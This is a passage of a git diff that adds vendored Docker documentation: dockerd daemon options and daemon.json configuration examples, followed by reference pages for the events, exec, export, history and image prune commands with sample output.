+ - Using `--privileged` mode flag on `docker run` (unless also specifying `--userns=host`)
+
+In general, user namespaces are an advanced feature and will require
+coordination with other capabilities. For example, if volumes are mounted from
+the host, file ownership will have to be pre-arranged if the user or
+administrator wishes the containers to have expected access to the volume
+contents. Note that when using external volume or graph driver plugins, those
+external software programs must be made aware of user and group mapping ranges
+if they are to work seamlessly with user namespace support.
+
+Finally, while the `root` user inside a user namespaced container process has
+many of the expected admin privileges that go along with being the superuser, the
+Linux kernel has restrictions based on internal knowledge that this is a user namespaced
+process. The most notable restriction that we are aware of at this time is the
+inability to use `mknod`. Permission will be denied for device creation even as
+container `root` inside a user namespace.
+
+## Miscellaneous options
+
+IP masquerading uses address translation to allow containers without a public
+IP to talk to other machines on the Internet. This may interfere with some
+network topologies and can be disabled with `--ip-masq=false`.
+
+Docker supports softlinks for the Docker data directory (`/var/lib/docker`) and
+for `/var/lib/docker/tmp`. The `DOCKER_TMPDIR` and the data directory can be
+set like this:
+
+    DOCKER_TMPDIR=/mnt/disk2/tmp /usr/local/bin/dockerd -D -g /var/lib/docker -H unix:// > /var/lib/docker-machine/docker.log 2>&1
+    # or
+    export DOCKER_TMPDIR=/mnt/disk2/tmp
+    /usr/local/bin/dockerd -D -g /var/lib/docker -H unix:// > /var/lib/docker-machine/docker.log 2>&1
+
+## Default cgroup parent
+
+The `--cgroup-parent` option allows you to set the default cgroup parent
+to use for containers. If this option is not set, it defaults to `/docker` for
+fs cgroup driver and `system.slice` for systemd cgroup driver.
+
+If the cgroup has a leading forward slash (`/`), the cgroup is created
+under the root cgroup, otherwise the cgroup is created under the daemon
+cgroup.
+
+Assuming the daemon is running in cgroup `daemoncgroup`,
+`--cgroup-parent=/foobar` creates a cgroup in
+`/sys/fs/cgroup/memory/foobar`, whereas using `--cgroup-parent=foobar`
+creates the cgroup in `/sys/fs/cgroup/memory/daemoncgroup/foobar`
+
+The systemd cgroup driver has different rules for `--cgroup-parent`. Systemd
+represents hierarchy by slice and the name of the slice encodes the location in
+the tree. So `--cgroup-parent` for systemd cgroups should be a slice name. A
+name can consist of a dash-separated series of names, which describes the path
+to the slice from the root slice. For example, `--cgroup-parent=user-a-b.slice`
+means the memory cgroup for the container is created in
+`/sys/fs/cgroup/memory/user.slice/user-a.slice/user-a-b.slice/docker-<id>.scope`.
+
+This setting can also be set per container, using the `--cgroup-parent`
+option on `docker create` and `docker run`, and takes precedence over
+the `--cgroup-parent` option on the daemon.
+
+## Daemon Metrics
+
+The `--metrics-addr` option takes a tcp address to serve the metrics API.
+This feature is still experimental, therefore, the daemon must be running in experimental
+mode for this feature to work.
+
+To serve the metrics API on localhost:1337 you would specify `--metrics-addr 127.0.0.1:1337`
+allowing you to make requests on the API at `127.0.0.1:1337/metrics` to receive metrics in the
+[prometheus](https://prometheus.io/docs/instrumenting/exposition_formats/) format.
+
+If you are running a prometheus server you can add this address to your scrape configs
+to have prometheus collect metrics on Docker.  For more information
+on prometheus you can view the website [here](https://prometheus.io/).
+
+```yml
+scrape_configs:
+  - job_name: 'docker'
+    static_configs:
+      - targets: ['127.0.0.1:1337']
+```
+
+Please note that this feature is still marked as experimental as metrics and metric
+names could change while this feature is still in experimental.  Please provide
+feedback on what you would like to see collected in the API.
+
+## Daemon configuration file
+
+The `--config-file` option allows you to set any configuration option
+for the daemon in a JSON format. This file uses the same flag names as keys,
+except for flags that allow several entries, where it uses the plural
+of the flag name, e.g., `labels` for the `label` flag.
+
+The options set in the configuration file must not conflict with options set
+via flags. The docker daemon fails to start if an option is duplicated between
+the file and the flags, regardless their value. We do this to avoid
+silently ignore changes introduced in configuration reloads.
+For example, the daemon fails to start if you set daemon labels
+in the configuration file and also set daemon labels via the `--label` flag.
+Options that are not present in the file are ignored when the daemon starts.
+
+### Linux configuration file
+
+The default location of the configuration file on Linux is
+`/etc/docker/daemon.json`. The `--config-file` flag can be used to specify a
+ non-default location.
+
+This is a full example of the allowed configuration options on Linux:
+
+```json
+{
+	"authorization-plugins": [],
+	"dns": [],
+	"dns-opts": [],
+	"dns-search": [],
+	"exec-opts": [],
+	"exec-root": "",
+	"experimental": false,
+	"storage-driver": "",
+	"storage-opts": [],
+	"labels": [],
+	"live-restore": true,
+	"log-driver": "",
+	"log-opts": {},
+	"mtu": 0,
+	"pidfile": "",
+	"graph": "",
+	"cluster-store": "",
+	"cluster-store-opts": {},
+	"cluster-advertise": "",
+	"max-concurrent-downloads": 3,
+	"max-concurrent-uploads": 5,
+	"shutdown-timeout": 15,
+	"debug": true,
+	"hosts": [],
+	"log-level": "",
+	"tls": true,
+	"tlsverify": true,
+	"tlscacert": "",
+	"tlscert": "",
+	"tlskey": "",
+	"swarm-default-advertise-addr": "",
+	"api-cors-header": "",
+	"selinux-enabled": false,
+	"userns-remap": "",
+	"group": "",
+	"cgroup-parent": "",
+	"default-ulimits": {},
+	"init": false,
+	"init-path": "/usr/libexec/docker-init",
+	"ipv6": false,
+	"iptables": false,
+	"ip-forward": false,
+	"ip-masq": false,
+	"userland-proxy": false,
+	"userland-proxy-path": "/usr/libexec/docker-proxy",
+	"ip": "0.0.0.0",
+	"bridge": "",
+	"bip": "",
+	"fixed-cidr": "",
+	"fixed-cidr-v6": "",
+	"default-gateway": "",
+	"default-gateway-v6": "",
+	"icc": false,
+	"raw-logs": false,
+	"registry-mirrors": [],
+	"seccomp-profile": "",
+	"insecure-registries": [],
+	"disable-legacy-registry": false,
+	"default-runtime": "runc",
+	"oom-score-adjust": -500,
+	"runtimes": {
+		"runc": {
+			"path": "runc"
+		},
+		"custom": {
+			"path": "/usr/local/bin/my-runc-replacement",
+			"runtimeArgs": [
+				"--debug"
+			]
+		}
+	}
+}
+```
+
+### Windows configuration file
+
+The default location of the configuration file on Windows is
+ `%programdata%\docker\config\daemon.json`. The `--config-file` flag can be
+ used to specify a non-default location.
+
+This is a full example of the allowed configuration options on Windows:
+
+```json
+{
+    "authorization-plugins": [],
+    "dns": [],
+    "dns-opts": [],
+    "dns-search": [],
+    "exec-opts": [],
+    "experimental": false,
+    "storage-driver": "",
+    "storage-opts": [],
+    "labels": [],
+    "log-driver": "",
+    "mtu": 0,
+    "pidfile": "",
+    "graph": "",
+    "cluster-store": "",
+    "cluster-advertise": "",
+    "max-concurrent-downloads": 3,
+    "max-concurrent-uploads": 5,
+    "shutdown-timeout": 15,
+    "debug": true,
+    "hosts": [],
+    "log-level": "",
+    "tlsverify": true,
+    "tlscacert": "",
+    "tlscert": "",
+    "tlskey": "",
+    "swarm-default-advertise-addr": "",
+    "group": "",
+    "default-ulimits": {},
+    "bridge": "",
+    "fixed-cidr": "",
+    "raw-logs": false,
+    "registry-mirrors": [],
+    "insecure-registries": [],
+    "disable-legacy-registry": false
+}
+```
+
+### Configuration reloading
+
+Some options can be reconfigured when the daemon is running without requiring
+to restart the process. We use the `SIGHUP` signal in Linux to reload, and a global event
+in Windows with the key `Global\docker-daemon-config-$PID`. The options can
+be modified in the configuration file but still will check for conflicts with
+the provided flags. The daemon fails to reconfigure itself
+if there are conflicts, but it won't stop execution.
+
+The list of currently supported options that can be reconfigured is this:
+
+- `debug`: it changes the daemon to debug mode when set to true.
+- `cluster-store`: it reloads the discovery store with the new address.
+- `cluster-store-opts`: it uses the new options to reload the discovery store.
+- `cluster-advertise`: it modifies the address advertised after reloading.
+- `labels`: it replaces the daemon labels with a new set of labels.
+- `live-restore`: Enables [keeping containers alive during daemon downtime](https://docs.docker.com/engine/admin/live-restore/).
+- `max-concurrent-downloads`: it updates the max concurrent downloads for each pull.
+- `max-concurrent-uploads`: it updates the max concurrent uploads for each push.
+- `default-runtime`: it updates the runtime to be used if not is
+  specified at container creation. It defaults to "default" which is
+  the runtime shipped with the official docker packages.
+- `runtimes`: it updates the list of available OCI runtimes that can
+  be used to run containers
+- `authorization-plugin`: specifies the authorization plugins to use.
+- `insecure-registries`: it replaces the daemon insecure registries with a new set of insecure registries. If some existing insecure registries in daemon's configuration are not in newly reloaded insecure resgitries, these existing ones will be removed from daemon's config.
+
+Updating and reloading the cluster configurations such as `--cluster-store`,
+`--cluster-advertise` and `--cluster-store-opts` will take effect only if
+these configurations were not previously configured. If `--cluster-store`
+has been provided in flags and `cluster-advertise` not, `cluster-advertise`
+can be added in the configuration file without accompanied by `--cluster-store`.
+Configuration reload will log a warning message if it detects a change in
+previously configured cluster configurations.
+
+
+## Running multiple daemons
+
+> **Note:** Running multiple daemons on a single host is considered as "experimental". The user should be aware of
+> unsolved problems. This solution may not work properly in some cases. Solutions are currently under development
+> and will be delivered in the near future.
+
+This section describes how to run multiple Docker daemons on a single host. To
+run multiple daemons, you must configure each daemon so that it does not
+conflict with other daemons on the same host. You can set these options either
+by providing them as flags, or by using a [daemon configuration file](#daemon-configuration-file).
+
+The following daemon options must be configured for each daemon:
+
+```bash
+-b, --bridge=                          Attach containers to a network bridge
+--exec-root=/var/run/docker            Root of the Docker execdriver
+-g, --graph=/var/lib/docker            Root of the Docker runtime
+-p, --pidfile=/var/run/docker.pid      Path to use for daemon PID file
+-H, --host=[]                          Daemon socket(s) to connect to
+--iptables=true                        Enable addition of iptables rules
+--config-file=/etc/docker/daemon.json  Daemon configuration file
+--tlscacert="~/.docker/ca.pem"         Trust certs signed only by this CA
+--tlscert="~/.docker/cert.pem"         Path to TLS certificate file
+--tlskey="~/.docker/key.pem"           Path to TLS key file
+```
+
+When your daemons use different values for these flags, you can run them on the same host without any problems.
+It is very important to properly understand the meaning of those options and to use them correctly.
+
+- The `-b, --bridge=` flag is set to `docker0` as default bridge network. It is created automatically when you install Docker.
+If you are not using the default, you must create and configure the bridge manually or just set it to 'none': `--bridge=none`
+- `--exec-root` is the path where the container state is stored. The default value is `/var/run/docker`. Specify the path for
+your running daemon here.
+- `--graph` is the path where images are stored. The default value is `/var/lib/docker`. To avoid any conflict with other daemons
+set this parameter separately for each daemon.
+- `-p, --pidfile=/var/run/docker.pid` is the path where the process ID of the daemon is stored. Specify the path for your
+pid file here.
+- `--host=[]` specifies where the Docker daemon will listen for client connections. If unspecified, it defaults to `/var/run/docker.sock`.
+-  `--iptables=false` prevents the Docker daemon from adding iptables rules. If
+multiple daemons manage iptables rules, they may overwrite rules set by another
+daemon. Be aware that disabling this option requires you to manually add
+iptables rules to expose container ports. If you prevent Docker from adding
+iptables rules, Docker will also not add IP masquerading rules, even if you set
+`--ip-masq` to `true`. Without IP masquerading rules, Docker containers will not be
+able to connect to external hosts or the internet when using network other than
+default bridge.
+- `--config-file=/etc/docker/daemon.json` is the path where configuration file is stored. You can use it instead of
+daemon flags. Specify the path for each daemon.
+- `--tls*` Docker daemon supports `--tlsverify` mode that enforces encrypted and authenticated remote connections.
+The `--tls*` options enable use of specific certificates for individual daemons.
+
+Example script for a separate “bootstrap” instance of the Docker daemon without network:
+
+```bash
+$ sudo dockerd \
+        -H unix:///var/run/docker-bootstrap.sock \
+        -p /var/run/docker-bootstrap.pid \
+        --iptables=false \
+        --ip-masq=false \
+        --bridge=none \
+        --graph=/var/lib/docker-bootstrap \
+        --exec-root=/var/run/docker-bootstrap
+```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/events.md b/vendor/github.com/docker/docker/docs/reference/commandline/events.md
new file mode 100644
index 0000000000..baa966d620
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/events.md
@@ -0,0 +1,217 @@
+---
+title: "events"
+description: "The events command description and usage"
+keywords: "events, container, report"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# events
+
+```markdown
+Usage:  docker events [OPTIONS]
+
+Get real time events from the server
+
+Options:
+  -f, --filter value   Filter output based on conditions provided (default [])
+      --format string  Format the output using the given Go template
+      --help           Print usage
+      --since string   Show all events created since timestamp
+      --until string   Stream events until this timestamp
+```
+
+Docker containers report the following events:
+
+    attach, commit, copy, create, destroy, detach, die, exec_create, exec_detach, exec_start, export, health_status, kill, oom, pause, rename, resize, restart, start, stop, top, unpause, update
+
+Docker images report the following events:
+
+    delete, import, load, pull, push, save, tag, untag
+
+Docker plugins report the following events:
+
+    install, enable, disable, remove
+
+Docker volumes report the following events:
+
+    create, mount, unmount, destroy
+
+Docker networks report the following events:
+
+    create, connect, disconnect, destroy
+
+Docker daemon report the following events:
+
+    reload
+
+The `--since` and `--until` parameters can be Unix timestamps, date formatted
+timestamps, or Go duration strings (e.g. `10m`, `1h30m`) computed
+relative to the client machine’s time. If you do not provide the `--since` option,
+the command returns only new and/or live events.  Supported formats for date
+formatted time stamps include RFC3339Nano, RFC3339, `2006-01-02T15:04:05`,
+`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local
+timezone on the client will be used if you do not provide either a `Z` or a
+`+-00:00` timezone offset at the end of the timestamp.  When providing Unix
+timestamps enter seconds[.nanoseconds], where seconds is the number of seconds
+that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap
+seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a
+fraction of a second no more than nine digits long.
+
+## Filtering
+
+The filtering flag (`-f` or `--filter`) format is of "key=value". If you would
+like to use multiple filters, pass multiple flags (e.g.,
+`--filter "foo=bar" --filter "bif=baz"`)
+
+Using the same filter multiple times will be handled as a *OR*; for example
+`--filter container=588a23dac085 --filter container=a8f7720b8c22` will display
+events for container 588a23dac085 *OR* container a8f7720b8c22
+
+Using multiple filters will be handled as a *AND*; for example
+`--filter container=588a23dac085 --filter event=start` will display events for
+container container 588a23dac085 *AND* the event type is *start*
+
+The currently supported filters are:
+
+* container (`container=<name or id>`)
+* event (`event=<event action>`)
+* image (`image=<tag or id>`)
+* plugin (experimental) (`plugin=<name or id>`)
+* label (`label=<key>` or `label=<key>=<value>`)
+* type (`type=<container or image or volume or network or daemon>`)
+* volume (`volume=<name or id>`)
+* network (`network=<name or id>`)
+* daemon (`daemon=<name or id>`)
+
+## Format
+
+If a format (`--format`) is specified, the given template will be executed
+instead of the default
+format. Go's [text/template](http://golang.org/pkg/text/template/) package
+describes all the details of the format.
+
+If a format is set to `{{json .}}`, the events are streamed as valid JSON
+Lines. For information about JSON Lines, please refer to http://jsonlines.org/ .
+
+## Examples
+
+You'll need two shells for this example.
+
+**Shell 1: Listening for events:**
+
+    $ docker events
+
+**Shell 2: Start and Stop containers:**
+
+    $ docker start 4386fb97867d
+    $ docker stop 4386fb97867d
+    $ docker stop 7805c1d35632
+
+**Shell 1: (Again .. now showing events):**
+
+    2015-05-12T11:51:30.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04)
+    2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
+    2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
+    2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
+    2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
+
+**Show events in the past from a specified time:**
+
+    $ docker events --since 1378216169
+    2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
+    2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
+    2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
+    2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
+
+    $ docker events --since '2013-09-03'
+    2015-05-12T11:51:30.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04)
+    2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
+    2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
+    2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
+    2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
+
+    $ docker events --since '2013-09-03T15:49:29'
+    2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
+    2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
+    2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
+    2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
+
+This example outputs all events that were generated in the last 3 minutes,
+relative to the current time on the client machine:
+
+    $ docker events --since '3m'
+    2015-05-12T11:51:30.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
+    2015-05-12T15:52:12.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
+    2015-05-12T15:53:45.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
+    2015-05-12T15:54:03.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
+
+**Filter events:**
+
+    $ docker events --filter 'event=stop'
+    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
+    2014-09-03T17:42:14.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
+
+    $ docker events --filter 'image=ubuntu-1:14.04'
+    2014-05-10T17:42:14.999999999Z07:00 container start 4386fb97867d (image=ubuntu-1:14.04)
+    2014-05-10T17:42:14.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
+    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
+
+    $ docker events --filter 'container=7805c1d35632'
+    2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
+    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image= redis:2.8)
+
+    $ docker events --filter 'container=7805c1d35632' --filter 'container=4386fb97867d'
+    2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
+    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
+    2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (image=redis:2.8)
+    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
+
+    $ docker events --filter 'container=7805c1d35632' --filter 'event=stop'
+    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
+
+    $ docker events --filter 'container=container_1' --filter 'container=container_2'
+    2014-09-03T15:49:29.999999999Z07:00 container die 4386fb97867d (image=ubuntu-1:14.04)
+    2014-05-10T17:42:14.999999999Z07:00 container stop 4386fb97867d (image=ubuntu-1:14.04)
+    2014-05-10T17:42:14.999999999Z07:00 container die 7805c1d35632 (imager=redis:2.8)
+    2014-09-03T15:49:29.999999999Z07:00 container stop 7805c1d35632 (image=redis:2.8)
+
+    $ docker events --filter 'type=volume'
+    2015-12-23T21:05:28.136212689Z volume create test-event-volume-local (driver=local)
+    2015-12-23T21:05:28.383462717Z volume mount test-event-volume-local (read/write=true, container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, destination=/foo, driver=local, propagation=rprivate)
+    2015-12-23T21:05:28.650314265Z volume unmount test-event-volume-local (container=562fe10671e9273da25eed36cdce26159085ac7ee6707105fd534866340a5025, driver=local)
+    2015-12-23T21:05:28.716218405Z volume destroy test-event-volume-local (driver=local)
+
+    $ docker events --filter 'type=network'
+    2015-12-23T21:38:24.705709133Z network create 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, type=bridge)
+    2015-12-23T21:38:25.119625123Z network connect 8b111217944ba0ba844a65b13efcd57dc494932ee2527577758f939315ba2c5b (name=test-event-network-local, container=b4be644031a3d90b400f88ab3d4bdf4dc23adb250e696b6328b85441abe2c54e, type=bridge)
+
+    $ docker events --filter 'type=plugin' (experimental)
+    2016-07-25T17:30:14.825557616Z plugin pull ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest)
+    2016-07-25T17:30:14.888127370Z plugin enable ec7b87f2ce84330fe076e666f17dfc049d2d7ae0b8190763de94e1f2d105993f (name=tiborvass/sample-volume-plugin:latest)
+
+**Format:**
+
+    $ docker events --filter 'type=container' --format 'Type={{.Type}}  Status={{.Status}}  ID={{.ID}}'
+    Type=container  Status=create  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
+    Type=container  Status=attach  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
+    Type=container  Status=start  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
+    Type=container  Status=resize  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
+    Type=container  Status=die  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
+    Type=container  Status=destroy  ID=2ee349dac409e97974ce8d01b70d250b85e0ba8189299c126a87812311951e26
+
+**Format (as JSON Lines):**
+
+    $ docker events --format '{{json .}}'
+    {"status":"create","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4..
+    {"status":"attach","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4..
+    {"Type":"network","Action":"connect","Actor":{"ID":"1b50a5bf755f6021dfa78e..
+    {"status":"start","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f42..
+    {"status":"resize","id":"196016a57679bf42424484918746a9474cd905dd993c4d0f4..
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/exec.md b/vendor/github.com/docker/docker/docs/reference/commandline/exec.md
new file mode 100644
index 0000000000..38891c9ea0
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/exec.md
@@ -0,0 +1,65 @@
+---
+title: "exec"
+description: "The exec command description and usage"
+keywords: "command, container, run, execute"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# exec
+
+```markdown
+Usage:  docker exec [OPTIONS] CONTAINER COMMAND [ARG...]
+
+Run a command in a running container
+
+Options:
+  -d, --detach         Detached mode: run command in the background
+      --detach-keys    Override the key sequence for detaching a container
+  -e, --env=[]         Set environment variables
+      --help           Print usage
+  -i, --interactive    Keep STDIN open even if not attached
+      --privileged     Give extended privileges to the command
+  -t, --tty            Allocate a pseudo-TTY
+  -u, --user           Username or UID (format: <name|uid>[:<group|gid>])
+```
+
+The `docker exec` command runs a new command in a running container.
+
+The command started using `docker exec` only runs while the container's primary
+process (`PID 1`) is running, and it is not restarted if the container is
+restarted.
+
+If the container is paused, then the `docker exec` command will fail with an error:
+
+    $ docker pause test
+    test
+    $ docker ps
+    CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS                   PORTS               NAMES
+    1ae3b36715d2        ubuntu:latest       "bash"              17 seconds ago      Up 16 seconds (Paused)                       test
+    $ docker exec test ls
+    FATA[0000] Error response from daemon: Container test is paused, unpause the container before exec
+    $ echo $?
+    1
+
+## Examples
+
+    $ docker run --name ubuntu_bash --rm -i -t ubuntu bash
+
+This will create a container named `ubuntu_bash` and start a Bash session.
+
+    $ docker exec -d ubuntu_bash touch /tmp/execWorks
+
+This will create a new file `/tmp/execWorks` inside the running container
+`ubuntu_bash`, in the background.
+
+    $ docker exec -it ubuntu_bash bash
+
+This will create a new Bash session in the container `ubuntu_bash`.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/export.md b/vendor/github.com/docker/docker/docs/reference/commandline/export.md
new file mode 100644
index 0000000000..1004fc30c0
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/export.md
@@ -0,0 +1,43 @@
+---
+title: "export"
+description: "The export command description and usage"
+keywords: "export, file, system, container"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# export
+
+```markdown
+Usage:  docker export [OPTIONS] CONTAINER
+
+Export a container's filesystem as a tar archive
+
+Options:
+      --help            Print usage
+  -o, --output string   Write to a file, instead of STDOUT
+```
+
+The `docker export` command does not export the contents of volumes associated
+with the container. If a volume is mounted on top of an existing directory in
+the container, `docker export` will export the contents of the *underlying*
+directory, not the contents of the volume.
+
+Refer to [Backup, restore, or migrate data
+volumes](https://docs.docker.com/engine/tutorials/dockervolumes/#backup-restore-or-migrate-data-volumes) in
+the user guide for examples on exporting data in a volume.
+
+## Examples
+
+    $ docker export red_panda > latest.tar
+
+Or
+
+    $ docker export --output="latest.tar" red_panda
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/history.md b/vendor/github.com/docker/docker/docs/reference/commandline/history.md
new file mode 100644
index 0000000000..00f88db35b
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/history.md
@@ -0,0 +1,48 @@
+---
+title: "history"
+description: "The history command description and usage"
+keywords: "docker, image, history"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# history
+
+```markdown
+Usage:  docker history [OPTIONS] IMAGE
+
+Show the history of an image
+
+Options:
+      --help       Print usage
+  -H, --human      Print sizes and dates in human readable format (default true)
+      --no-trunc   Don't truncate output
+  -q, --quiet      Only show numeric IDs
+```
+
+To see how the `docker:latest` image was built:
+
+    $ docker history docker
+    IMAGE               CREATED             CREATED BY                                      SIZE                COMMENT
+    3e23a5875458        8 days ago          /bin/sh -c #(nop) ENV LC_ALL=C.UTF-8            0 B
+    8578938dd170        8 days ago          /bin/sh -c dpkg-reconfigure locales &&    loc   1.245 MB
+    be51b77efb42        8 days ago          /bin/sh -c apt-get update && apt-get install    338.3 MB
+    4b137612be55        6 weeks ago         /bin/sh -c #(nop) ADD jessie.tar.xz in /        121 MB
+    750d58736b4b        6 weeks ago         /bin/sh -c #(nop) MAINTAINER Tianon Gravi <ad   0 B
+    511136ea3c5a        9 months ago                                                        0 B                 Imported from -
+
+To see how the `docker:apache` image was added to a container's base image:
+
+    $ docker history docker:scm
+    IMAGE               CREATED             CREATED BY                                      SIZE                COMMENT
+    2ac9d1098bf1        3 months ago        /bin/bash                                       241.4 MB            Added Apache to Fedora base image
+    88b42ffd1f7c        5 months ago        /bin/sh -c #(nop) ADD file:1fd8d7f9f6557cafc7   373.7 MB
+    c69cab00d6ef        5 months ago        /bin/sh -c #(nop) MAINTAINER Lokesh Mandvekar   0 B
+    511136ea3c5a        19 months ago                                                       0 B                 Imported from -
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/image_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/image_prune.md
new file mode 100644
index 0000000000..a80b8d38c8
--- /dev/null
+++ b/vendor/github.com/docker/docker/docs/reference/commandline/image_prune.md
@@ -0,0 +1,71 @@
+---
+title: "image prune"
+description: "Remove all stopped images"
+keywords: "image, prune, delete, remove"
+---
+
+<!-- This file is maintained within the docker/docker Github
+     repository at https://github.com/docker/docker/. Make all
+     pull requests against that repo. If you see this file in
+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+# image prune
+
+```markdown
+Usage:	docker image prune [OPTIONS]
+
+Remove unused images
+
+Options:
+  -a, --all     Remove all unused images, not just dangling ones
+  -f, --force   Do not prompt for confirmation
+      --help    Print usage
+```
+
+Remove all dangling images. If `-a` is specified, will also remove all images not referenced by any container.
+
+Example output:
+
+```bash
+$ docker image prune -a
+WARNING! This will remove all images without at least one container associated to them.
+Are you sure you want to continue? [y/N] y
+Deleted Images:
+untagged: alpine:latest
+untagged: alpine@sha256:3dcdb92d7432d56604d4545cbd324b14e647b313626d99b889d0626de158f73a
+deleted: sha256:4e38e38c8ce0b8d9041a9c4fefe786631d1416225e13b0bfe8cfa2321aec4bba
+deleted: sha256:4fe15f8d0ae69e169824f25f1d4da3015a48feeeeebb265cd2e328e15c6a869f
+untagged: alpine:3.3
+untagged: alpine@sha256:4fa633f4feff6a8f02acfc7424efd5cb3e76686ed3218abf4ca0fa4a2a358423
+untagged: my-jq:latest
+deleted: sha256:ae67841be6d008a374eff7c2a974cde3934ffe9536a7dc7ce589585eddd83aff
+deleted: sha256:34f6f1261650bc341eb122313372adc4512b4fceddc2a7ecbb84f0958ce5ad65
+deleted: sha256:cf4194e8d8db1cb2d117df33f2c75c0369c3a26d96725efb978cc69e046b87e7
+untagged: my-curl:latest
+deleted: sha256:b2789dd875bf427de7f9f6ae001940073b3201409b14aba7e5db71f408b8569e
+deleted: sha256:96daac0cb203226438989926fc34dd024f365a9a8616b93e168d303cfe4cb5e9
+deleted: sha256:5cbd97a14241c9cd83250d6b6fc0649833c4a3e84099b968dd4ba403e609945e
+deleted: sha256:a0971c4015c1e898c60bf95781c6730a05b5d8a2ae6827f53837e6c9d38efdec
+deleted: sha256:d8359ca3b681cc5396a4e790088441673ed3ce90ebc04de388bfcd31a0716b06
+deleted: sha256:83fc9ba8fb70e1da31dfcc3c88d093831dbd4be38b34af998df37e8ac538260c
+deleted: sha256:ae7041a4cc625a9c8e6955452f7afe602b401f662671cea3613f08f3d9343b35
